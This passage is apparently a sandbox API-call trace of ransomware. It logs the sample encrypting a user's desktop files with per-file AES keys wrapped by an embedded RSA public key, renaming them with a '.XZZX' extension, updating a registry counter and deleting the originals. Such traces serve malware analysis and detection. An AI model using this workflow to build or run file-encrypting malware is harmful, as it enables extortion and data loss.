(in: hProv=0x43a59c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5550) returned 1 [0170.387] CryptExportKey (in: hKey=0x3a5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.387] CryptExportKey (in: hKey=0x3a5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.387] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.388] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0170.388] CryptDestroyKey (hKey=0x3a5550) returned 1 [0170.388] CryptReleaseContext (hProv=0x43a59c0, dwFlags=0x0) returned 1 [0170.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\C85257232EB7E6DDB4D24C9F3152CB25.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\c85257232eb7e6ddb4d24c9f3152cb25.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e4 [0170.389] WriteFile (in: hFile=0x9e4, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xf206, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xf206, lpOverlapped=0x0) returned 1 [0170.390] SetFilePointer (in: hFile=0x9e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf206 [0170.390] WriteFile (in: hFile=0x9e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.390] SetFilePointer (in: hFile=0x9e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf20b [0170.390] WriteFile (in: hFile=0x9e4, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x26, lpOverlapped=0x0) returned 1 [0170.390] SetFilePointer (in: hFile=0x9e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf231 [0170.390] WriteFile (in: hFile=0x9e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.390] SetFilePointer (in: hFile=0x9e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf236 [0170.391] SetErrorMode (uMode=0x1) returned 0x1 [0170.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0170.391] OutputDebugStringW (lpOutputString="end") [0170.391] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.391] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0170.391] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a59c0) returned 1 [0170.392] CryptImportPublicKeyInfo (in: hCryptProv=0x43a59c0, dwCertEncodingType=0x1, pInfo=0x43a2cc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a2cf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a2cf8*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3cde5d8) returned 1 [0170.392] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.392] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0170.392] CryptEncrypt (in: hKey=0x3cde5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0170.392] CryptEncrypt (in: hKey=0x3cde5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5a48*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5a48*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0170.392] WriteFile (in: hFile=0x9e4, lpBuffer=0x43a5a48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5a48*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0170.392] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0170.392] WriteFile (in: hFile=0x9e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.393] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0170.393] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0170.393] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9ec) returned 0x0 [0170.393] RegQueryValueExW (in: hKey=0x9ec, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x102, lpcbData=0x29adfdc*=0x4) returned 0x0 [0170.393] RegCloseKey (hKey=0x9ec) returned 0x0 [0170.393] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9ec) returned 0x0 [0170.393] RegSetValueExW (in: hKey=0x9ec, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x103, cbData=0x4 | out: lpData=0x29adfec*=0x103) returned 0x0 [0170.393] RegCloseKey (hKey=0x9ec) returned 0x0 [0170.393] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.394] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.394] CloseHandle (hObject=0x9e4) returned 1 [0170.394] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0170.394] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0170.394] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\XiCIIZYNum_VSBs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\xiciizynum_vsbs.wav")) returned 1 [0170.395] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\XiCIIZYNum_VSBs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\xiciizynum_vsbs.wav")) returned 0 Thread: id = 584 os_tid = 0x660 [0170.421] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.421] lstrcpyW (in: lpString1=0x29af460, lpString2="ZxQsBuyh.ods" | out: lpString1="ZxQsBuyh.ods") returned="ZxQsBuyh.ods" [0170.421] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0170.421] SetErrorMode (uMode=0x1) returned 0x1 [0170.421] lstrcpyW (in: lpString1=0x29af860, lpString2="ZxQsBuyh.ods" | out: lpString1="ZxQsBuyh.ods") returned="ZxQsBuyh.ods" [0170.421] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x20525e54, Data2=0xe6eb, Data3=0x4486, Data4=([0]=0xa3, [1]=0xd3, [2]=0x51, [3]=0xb, [4]=0xb7, [5]=0x3d, [6]=0x43, [7]=0x64))) returned 0x0 [0170.421] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\ZxQsBuyh.ods") returned 74 [0170.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0170.421] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX") returned 99 [0170.421] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="XZZX") returned 0x0 [0170.421] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\ZxQsBuyh.ods", dwFileAttributes=0x20) returned 1 [0170.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\ZxQsBuyh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\zxqsbuyh.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e8 [0170.422] ReadFile (in: hFile=0x9e8, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xfc1b, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xfc1b, lpOverlapped=0x0) returned 1 [0170.424] CloseHandle (hObject=0x9e8) returned 1 [0170.424] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0170.424] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0170.424] SetErrorMode (uMode=0x1) returned 0x1 [0170.424] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0170.424] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5ad0) returned 1 [0170.426] CryptGenKey (in: hProv=0x43a5ad0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0170.554] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.554] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.554] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.555] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0170.555] CryptDestroyKey (hKey=0x4372978) returned 1 [0170.555] CryptReleaseContext (hProv=0x43a5ad0, dwFlags=0x0) returned 1 [0170.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\ac5c0f1c3dcf4b0220525e54406a2f4a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e8 [0170.556] WriteFile (in: hFile=0x9e8, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xfc1b, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xfc1b, lpOverlapped=0x0) returned 1 [0170.557] SetFilePointer (in: hFile=0x9e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfc1b [0170.557] WriteFile (in: hFile=0x9e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.557] SetFilePointer (in: hFile=0x9e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfc20 [0170.557] WriteFile (in: hFile=0x9e8, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x18, lpOverlapped=0x0) returned 1 [0170.557] SetFilePointer (in: hFile=0x9e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfc38 [0170.557] WriteFile (in: hFile=0x9e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.557] SetFilePointer (in: hFile=0x9e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfc3d [0170.557] SetErrorMode (uMode=0x1) returned 0x1 [0170.557] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0170.557] OutputDebugStringW (lpOutputString="end") [0170.557] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.557] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0170.557] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5ad0) returned 1 [0170.558] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5ad0, dwCertEncodingType=0x1, pInfo=0x43a2d90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a2dc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a2dc8*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372978) returned 1 [0170.558] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.558] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0170.558] CryptEncrypt (in: hKey=0x4372978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0170.558] CryptEncrypt (in: hKey=0x4372978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5b58*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5b58*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0170.558] WriteFile (in: hFile=0x9e8, lpBuffer=0x43a5b58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5b58*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0170.558] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0170.558] WriteFile (in: hFile=0x9e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.558] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0170.559] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0170.559] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9f0) returned 0x0 [0170.559] RegQueryValueExW (in: hKey=0x9f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x103, lpcbData=0x29adfdc*=0x4) returned 0x0 [0170.559] RegCloseKey (hKey=0x9f0) returned 0x0 [0170.559] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9f0) returned 0x0 [0170.559] RegSetValueExW (in: hKey=0x9f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x104, cbData=0x4 | out: lpData=0x29adfec*=0x104) returned 0x0 [0170.559] RegCloseKey (hKey=0x9f0) returned 0x0 [0170.559] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.559] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.559] CloseHandle (hObject=0x9e8) returned 1 [0170.559] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0170.560] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0170.560] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\ZxQsBuyh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\zxqsbuyh.ods")) returned 1 [0170.561] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\ZxQsBuyh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\zxqsbuyh.ods")) returned 0 Thread: id = 585 os_tid = 0x70c [0170.617] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.617] lstrcpyW (in: lpString1=0x29af460, lpString2="UzONnSwswGOnlESVfL.mp3" | out: lpString1="UzONnSwswGOnlESVfL.mp3") returned="UzONnSwswGOnlESVfL.mp3" [0170.617] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.617] SetErrorMode (uMode=0x1) returned 0x1 [0170.617] lstrcpyW (in: lpString1=0x29af860, lpString2="UzONnSwswGOnlESVfL.mp3" | out: lpString1="UzONnSwswGOnlESVfL.mp3") returned="UzONnSwswGOnlESVfL.mp3" [0170.617] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x9b3b5fdd, Data2=0x47b, Data3=0x4d3e, Data4=([0]=0x8a, [1]=0x97, [2]=0xb2, [3]=0xa3, [4]=0xfa, [5]=0x42, [6]=0x9f, [7]=0x44))) returned 0x0 [0170.617] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\UzONnSwswGOnlESVfL.mp3") returned 77 [0170.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0170.617] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\8306832F015A14CA9B3B5FDD03F4F912.XZZX") returned 92 [0170.617] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="XZZX") returned 0x0 [0170.617] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\UzONnSwswGOnlESVfL.mp3", dwFileAttributes=0x20) returned 1 [0170.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\UzONnSwswGOnlESVfL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 